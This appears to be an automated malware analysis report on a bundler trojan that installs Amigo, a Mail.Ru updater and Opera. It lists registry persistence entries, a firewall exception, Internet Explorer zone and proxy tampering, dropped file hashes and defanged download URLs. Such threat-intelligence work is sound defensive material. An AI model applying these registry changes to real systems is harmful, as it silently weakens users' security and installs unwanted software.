[HKCU\Software\Mail.Ru\AmigoInstaller]
"ua" = "CHANNEL_789176"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Amigo]
"lang" = "en"

[HKLM\SOFTWARE\RegisteredApplications]
"Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMinor" = "3"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Интернет.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application]
"amigo.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe:*:Enabled:Интернет"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Amigo]
"ap"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"first_bookmark_bar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Amigo]
"InstallerExtraCode1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"first_nosidebar"

The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 7E 96 A2 2B 96 C3 89 04 B2 15 D3 46 C1 4C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\WindowsUpdater]
"Count" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MailRuUpdater.exe:3616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Mail.Ru\Tech\ptls\{4519D3B5-465C-4AE2-A905-960CA7D5385C}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcsO4jKa8diJgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru\Tech\ptls\{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Mail.Ru\Tech\ptls\{8DC7BF6A-58F3-4740-B600-34E37FFADC21}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = ""
"Desktop" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ie" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Mail.Ru\Tech\ptls\{603A8599-628C-4F00-A940-A09F1583A23E}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcsO4jKa8diJgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Mail.Ru\Tech\ptls\{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}]
"RUNID" = "12"

[HKCU\Software\Mail.Ru\Tech\ptls\{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{66CD85E0-6D8E-444E-9D71-AED8BA171A26}]
"RUNID" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"CH" = "1"

[HKCU\Software\Mail.Ru\Tech\ptls\{66CD85E0-6D8E-444E-9D71-AED8BA171A26}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcsO4jKa8diJgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru]
"SicSettings" = "22 serialization::archive 11 0 0 1 0 0 0 0 0 20 0 0 1 0 0 0 0 24 0 0 0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 91 F9 D2 EB 2A 6D 6A 9F 3E A4 D4 9F 80 78 1A"

[HKCU\Software\Mail.Ru\Tech\ptls\{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Mail.Ru\Tech\ptls\{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcsO4jKa8diJgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Mail.Ru\Tech\ptls\{3CE4F0C3-2143-491F-8F20-27792166C41F}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ff" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKCU\Software\Mail.Ru\Tech\ptls\{4519D3B5-465C-4AE2-A905-960CA7D5385C}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcsO4jKa8diJgwKko97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

The Trojan deletes the following registry key(s):

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E0F35591-6BE3-4A56-B04F-6832749AFF74}Machine]
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E0F35591-6BE3-4A56-B04F-6832749AFF74}User]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ch"
"ff"
"ie"

The process MailRuUpdater.exe:3160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"Publisher" = "Mail.Ru"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"DisplayName" = "Служба автоматического обновления программ"

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{B713EDAE-6865-4903-A011-BCB0D93FC068}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Mail.Ru\Updater]
"Guid" = "{B713EDAE-6865-4903-A011-BCB0D93FC068}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMinor" = "17"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMajor" = "1"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru]
"MailRuUpdater.exe" = "Mail.Ru updater"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 42 DE 16 15 19 18 FF 88 8E 03 DD CD 58 B3 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application]
"amigo.exe"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater"

The process MailRuUpdater.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC 0A 46 C1 CF 73 80 94 37 FC 5B 07 C5 61 DA 8F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{99AABDAC-3566-42A9-AC5C-B2C0D035A442}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{99AABDAC-3566-42A9-AC5C-B2C0D035A442}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]

The process opera_crashreporter.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 D1 3C B6 7D 97 07 63 14 71 63 0D A2 85 5B 97"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

Dropped PE files

MD5 File path
a2bd113ec79d837a39153d1c14451d13 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp.exe
f9068a0fd9733ccac6462de3a5c98c8f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6.tmp.exe
f9068a0fd9733ccac6462de3a5c98c8f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Opera Installer\6.tmp.exe
f2c9fd80312bc9ba76928fc84abc1a4b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.exe
10059771f83ad70daae9b38b82053873 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup9338__14991.exe
10059771f83ad70daae9b38b82053873 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup9364__14991.exe
f2c9fd80312bc9ba76928fc84abc1a4b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_34.0.2036.41_Setup[1].exe
f9068a0fd9733ccac6462de3a5c98c8f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Opera_NI_stable[1].exe
a2bd113ec79d837a39153d1c14451d13 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Bundle[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 208960 209408 4.55126 2b414f1e2d0c51a4dc9041e2602cf087
.rdata 217088 85494 85504 2.73747 5704556a5fb84c548131225b5166da8c
.data 303104 15708 7168 2.6671 5f4f67e2018f81daf4907301323728a4
.rsrc 319488 708 1024 3.58864 3e7b7a288ed532ecf9e83b45f4c1050e
.reloc 323584 13238 13312 3.71186 6592c04d4171c05c59d68ab20bb08eda

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ip-api.com/xml
hxxp://www-google-analytics.l.google.com/collect
hxxp://osdsoft.com/download2/Bundle.exe 54.148.148.252
hxxp://osdsoft.com/download/bundles.xml?7ec5da77-cfa4-4fe8-ab72-f226421b0f93 54.148.148.252
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload1.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://dyno3mlj15jgv.cloudfront.net/V32/amipb.js
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://eu.net.opera.com/opera/stable?utm_source=winnersolution&utm_medium=pb&utm_campaign=1png
hxxp://dl.opera.com/download/get/?id=38979&autoupdate=1&ni=1&stream=stable&utm_source=winnersolution&utm_campaign=1png&utm_medium=pb&niuid=ff49e3dc-070d-4f68-99c4-f83b20733611 82.145.215.54
hxxp://fallback.global-ssl.fastly.net/pub/.custom/ABTest/win/Opera_34.0.2036.41_Setup.exe
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl
hxxp://e6845.dscb1.akamaiedge.net/evcs.crl
hxxp://autoupdate.geo.opera.com/geolocation/ 91.203.99.18
hxxp://www.google.com/favicon.ico 173.194.113.210
hxxp://any.edge.bing.com/s/a/bing_p.ico
hxxp://www.amazon.com/favicon.ico 54.239.17.7
hxxp://bits.wikimedia.org/favicon/wikipedia.ico 91.198.174.192
hxxp://e6845.dscb1.akamaiedge.net/ss.crl
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt
hxxp://crl.globalsign.net/root.crl 198.41.215.163
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436.crt
hxxp://crl.globalsign.com/gs/gsorganizationvalsha2g2.crl 198.41.214.187
hxxp://cs9.wac.phicdn.net/DigiCertGlobalRootCA.crl
hxxp://cs9.wac.phicdn.net/ssca-sha2-g4.crl
hxxp://rvip1.ue.cachefly.net/DigiCertHighAssuranceEVRootCA.crl
hxxp://cs9.wac.phicdn.net/sha2-ha-server-g3.crl
hxxp://redir.opera.com/speeddials/partner/facebook?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/amazon_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/ebay_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/yahoo?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/aliexpress_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/booking_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/expedia_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/macys_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/wallmart_com_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/nordstrom_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/youtube?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/priceline_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/product?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/wikipedia_org_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/buzzfeed_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/surfeasy?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/twitter_us?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/speeddials/partner/bestbuy_com?ab_tests=DNA-45706-2-group:DNA-45706-2 91.203.99.23
hxxp://redir.opera.com/previews/images/facebook_other/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/booking_com_us/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/amazon_us/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/yahoo_other/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/aliexpress_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/ebay_us/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/expedia_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/macys_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/nordstrom_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/wallmart_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/youtube_other/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/priceline_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/wikipedia_org_us/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/buzzfeed_com/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/surfeasy/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/product/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/twitter_us/sd_264x168.png 91.203.99.23
hxxp://redir.opera.com/previews/images/bestbuy_com/sd_264x168.png 91.203.99.23
hxxp://sitecheck2.opera.com/?host=redir.opera.com&hdn=H0WKpMbVXsif0I8OJoRVZA== 82.145.223.176
hxxp://redir.opera.com/www.opera.com/firstrun/?utm_source=winnersolution&utm_campaign=1png&utm_medium=pb&http_referrer=&query=/opera/stable?utm_source=winnersolution&utm_medium=pb&utm_campaign=1png 91.203.99.23
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436.crt 213.133.184.106
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt 213.133.184.106
hxxp://www.bing.com/s/a/bing_p.ico 204.79.197.200
hxxp://crl3.digicert.com/ssca-sha2-g4.crl 93.184.220.29
hxxp://www.google-analytics.com/collect 173.194.113.102
hxxp://www.lawfuldownload.com/namen.php 54.235.206.28
hxxp://www.lawfuldownload.com/index.php 54.235.206.28
hxxp://cdn1.lawfuldownload.com/V32/amipb.js 216.137.59.135
hxxp://get.geo.opera.com.global.prod.fastly.net/pub/.custom/ABTest/win/Opera_34.0.2036.41_Setup.exe 185.31.17.249
hxxp://ss.symcb.com/ss.crl 23.37.37.163
hxxp://www.lawfuldownload.com/finalize.php 54.235.206.28
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 213.133.184.106
